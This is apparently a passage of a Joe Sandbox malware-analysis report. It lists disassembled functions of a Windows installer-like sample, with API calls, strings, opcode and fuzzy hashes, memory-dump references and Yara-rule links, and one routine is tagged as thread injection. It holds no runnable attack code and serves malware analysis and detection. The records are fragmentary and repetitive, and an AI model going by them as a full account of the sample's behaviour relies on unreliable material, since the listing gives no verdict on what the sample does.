                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??3@$FileTime$AttributesSystemlstrlen
                                                                                                                                                                                                                                                • String ID: 03A$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                                                                                                                                                                                                • API String ID: 4038993085-2279431206
                                                                                                                                                                                                                                                • Opcode ID: 1e5f1ef11ab3d9e84330ff60a8d60345b5fdf25d940142a54a900a3d947b53ea
                                                                                                                                                                                                                                                • Instruction ID: 637b7b13a9bcd1d52ea1019587bfa2fb4435f6835f564ae220b3123002230846
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e5f1ef11ab3d9e84330ff60a8d60345b5fdf25d940142a54a900a3d947b53ea
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE312D71D0021EEACF05EF92CD429EEBBB4BF44318F10042BE911762E1DB785649DB98
                                                                                                                                                                                                                                                Function 0040755F Relevance: 10.6, APIs: 7, Instructions: 63timethreadinjectionCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 00407579
                                                                                                                                                                                                                                                • KillTimer.USER32(?,00000001), ref: 0040758A
                                                                                                                                                                                                                                                • SetTimer.USER32(?,00000001,00000000,00000000), ref: 004075B4
                                                                                                                                                                                                                                                • SuspendThread.KERNEL32(00000290), ref: 004075CD
                                                                                                                                                                                                                                                • ResumeThread.KERNEL32(00000290), ref: 004075EA
                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 0040760C
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DialogThreadTimer$KillResumeSuspend
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4151135813-0
                                                                                                                                                                                                                                                • Opcode ID: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
                                                                                                                                                                                                                                                • Instruction ID: ebb94c5c4675b2e6542c2b2cb7d5652cccd5624f9a00d71f737e39ca63bd9789
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9811BF70A08618BBD7212F15EE849E77BBDFB00756B00843AF523A05A0CB39BD00DA1D
                                                                                                                                                                                                                                                Function 00404E3F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 60COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,0000002B,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
                                                                                                                                                                                                                                                  • Part of subcall function 00404343: ??3@YAXPAX@Z.MSVCRT(?,?,?,004177C4,004177C4,?,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 004043B6
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,0000002B,004177C4,004177C4,00000000,0000002B,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00404EBC
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??3@$wsprintf
                                                                                                                                                                                                                                                • String ID: :Language:%u!$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                                                                                                                                                                                                • API String ID: 2704270482-1550708412
                                                                                                                                                                                                                                                • Opcode ID: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
                                                                                                                                                                                                                                                • Instruction ID: afe26c372a183c0ca4a1b7edc16cb7be903c3e4040aad79e05e22cec791dc9d0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8115E71B00018BBCF00FB95CC42EFE77ADAB84705B10402EBA15E3182DB78AB028799
                                                                                                                                                                                                                                                Function 00403880 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000,00000000), ref: 004038C6
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000), ref: 00403904
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405), ref: 0040392A
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788), ref: 00403932
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                                                                                                • String ID: %%T/$%%T\
                                                                                                                                                                                                                                                • API String ID: 613200358-2679640699
                                                                                                                                                                                                                                                • Opcode ID: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
                                                                                                                                                                                                                                                • Instruction ID: 53c9ca64f2466311d4136dbbff57d229d1af9e29f5fa76e56e45344ae10c91f3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5011DD3190410EBACF05FFA1D857CEDBB79AE00708F50806AB511760E1EF79A785DB98
                                                                                                                                                                                                                                                Function 0040393B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403981
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 004039BF
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405), ref: 004039E5
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784), ref: 004039ED
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                                                                                                • String ID: %%S/$%%S\
                                                                                                                                                                                                                                                • API String ID: 613200358-358529586
                                                                                                                                                                                                                                                • Opcode ID: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
                                                                                                                                                                                                                                                • Instruction ID: c240205f9e12946546b7747d8fd44f392230bc1153c6614d6b8016afa5fd7689
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D11AD3190410EBACF05FFA1D856CEDBB79AE00708F51806AB511760E1EF78A789DB98
                                                                                                                                                                                                                                                Function 004039F6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403A3C
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 00403A7A
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405), ref: 00403AA0
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784), ref: 00403AA8
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                                                                                                • String ID: %%M/$%%M\
                                                                                                                                                                                                                                                • API String ID: 613200358-4143866494
                                                                                                                                                                                                                                                • Opcode ID: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
                                                                                                                                                                                                                                                • Instruction ID: 5f6947e2f47a7d655e02fb84317d9747a35bc7200d49f7273ebe403b31479b31
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C911AD3190410EBACF05FFA1D956CEDBB79AE00708F51806AB511760E1EF78A789DB58
                                                                                                                                                                                                                                                Function 0040E456 Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 42COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • _CxxThrowException.MSVCRT(00000000,00414CFC), ref: 0040E4EE
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionThrow
                                                                                                                                                                                                                                                • String ID: $JA$4JA$DJA$TJA$hJA$xJA
                                                                                                                                                                                                                                                • API String ID: 432778473-803145960
                                                                                                                                                                                                                                                • Opcode ID: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                                                                                                                                                                                                                                                • Instruction ID: 5492ea6659e041f1bcf420c4685f7038b08242b420f8f2c51a6428b2159ddc92
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7211A5F0541B419BC7308F16E544587FBF8AF907587218A1FD0AA9BA51D3F8A1888B9C
                                                                                                                                                                                                                                                Function 0040C0DC Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 243COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0040BA46: ??2@YAPAXI@Z.MSVCRT(0000000C,?,0040C20C,004149B0,00000001,?,?,00000000), ref: 0040BA4B
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,004149B0,00000001,?,?,00000000), ref: 0040C20D
                                                                                                                                                                                                                                                  • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                                                                                                                                                                                                                  • Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                                                                                                                                                                                                                  • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,004149B0,00000001,?,?,00000000), ref: 0040C245
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??2@$??3@$memmove
                                                                                                                                                                                                                                                • String ID: IA$IA$IA
                                                                                                                                                                                                                                                • API String ID: 4294387087-924693538
                                                                                                                                                                                                                                                • Opcode ID: 85fc5e494f6b2b84d8098d484c2c91b8b6bfa0a3dc3e29a15476b27879269a5e
                                                                                                                                                                                                                                                • Instruction ID: 38d37476858cbe2739f158cf8086d9562841ccd83740beefedbf55b6536d6dac
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 85fc5e494f6b2b84d8098d484c2c91b8b6bfa0a3dc3e29a15476b27879269a5e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20B1C1B1900209DFCB54EFAAC8819DEBBB5BF48304F50852EF919A7291DB38A945CF54
                                                                                                                                                                                                                                                Function 0040E811 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • _CxxThrowException.MSVCRT(00100EC3,00414CFC), ref: 0040E83C
                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E864
                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?), ref: 0040E88D
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E898
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??2@??3@ExceptionThrowmemcpy
                                                                                                                                                                                                                                                • String ID: IA
                                                                                                                                                                                                                                                • API String ID: 3462485524-3293647318
                                                                                                                                                                                                                                                • Opcode ID: 87c970ed3d1d6bacfe04aab15aff8add49b6e5554cbd4f9de67434676486f6a2
                                                                                                                                                                                                                                                • Instruction ID: e9362666a157510f6fc1816af10740f0f0ab3f4ff6eb75305f8b2a096945a613
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 87c970ed3d1d6bacfe04aab15aff8add49b6e5554cbd4f9de67434676486f6a2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6811E5736003009BCB28AF57D880D6BFBE9AB84354714C83FEA59A7290D779E8954794
                                                                                                                                                                                                                                                Function 00401000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44stringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: wsprintf$ExitProcesslstrcat
                                                                                                                                                                                                                                                • String ID: 0x%p
                                                                                                                                                                                                                                                • API String ID: 2530384128-1745605757
                                                                                                                                                                                                                                                • Opcode ID: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
                                                                                                                                                                                                                                                • Instruction ID: 6c9eba3c29ae2a0cc7ccd16f79f39b6d6218d418ab2b897ff95ca6c62132cda7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF019E7580020CAFDB20AFA0DC45FDA777CBF44305F04486AF945A2081D738F6948FAA
                                                                                                                                                                                                                                                Function 00407A3A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000B), ref: 004071E0
                                                                                                                                                                                                                                                  • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000C), ref: 004071E9
                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00407A51
                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00407A62
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 00407B29
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MetricsSystem$??3@
                                                                                                                                                                                                                                                • String ID: 100%%
                                                                                                                                                                                                                                                • API String ID: 2562992111-568723177
                                                                                                                                                                                                                                                • Opcode ID: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
                                                                                                                                                                                                                                                • Instruction ID: d2e8aa6d75c6757367bbc63d1236441fd7733528c0e5853e38aed7656a5d7d9b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D31D771A047059FCB24DFA9C9419AEB7F4EF40308B00012EE542A26E1DB78FE44CF99
                                                                                                                                                                                                                                                Function 00407998 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 00407A12
                                                                                                                                                                                                                                                  • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
                                                                                                                                                                                                                                                  • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000004B3), ref: 004079C6
                                                                                                                                                                                                                                                  • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                                                                                                                                                                                                                  • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 004079E4
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
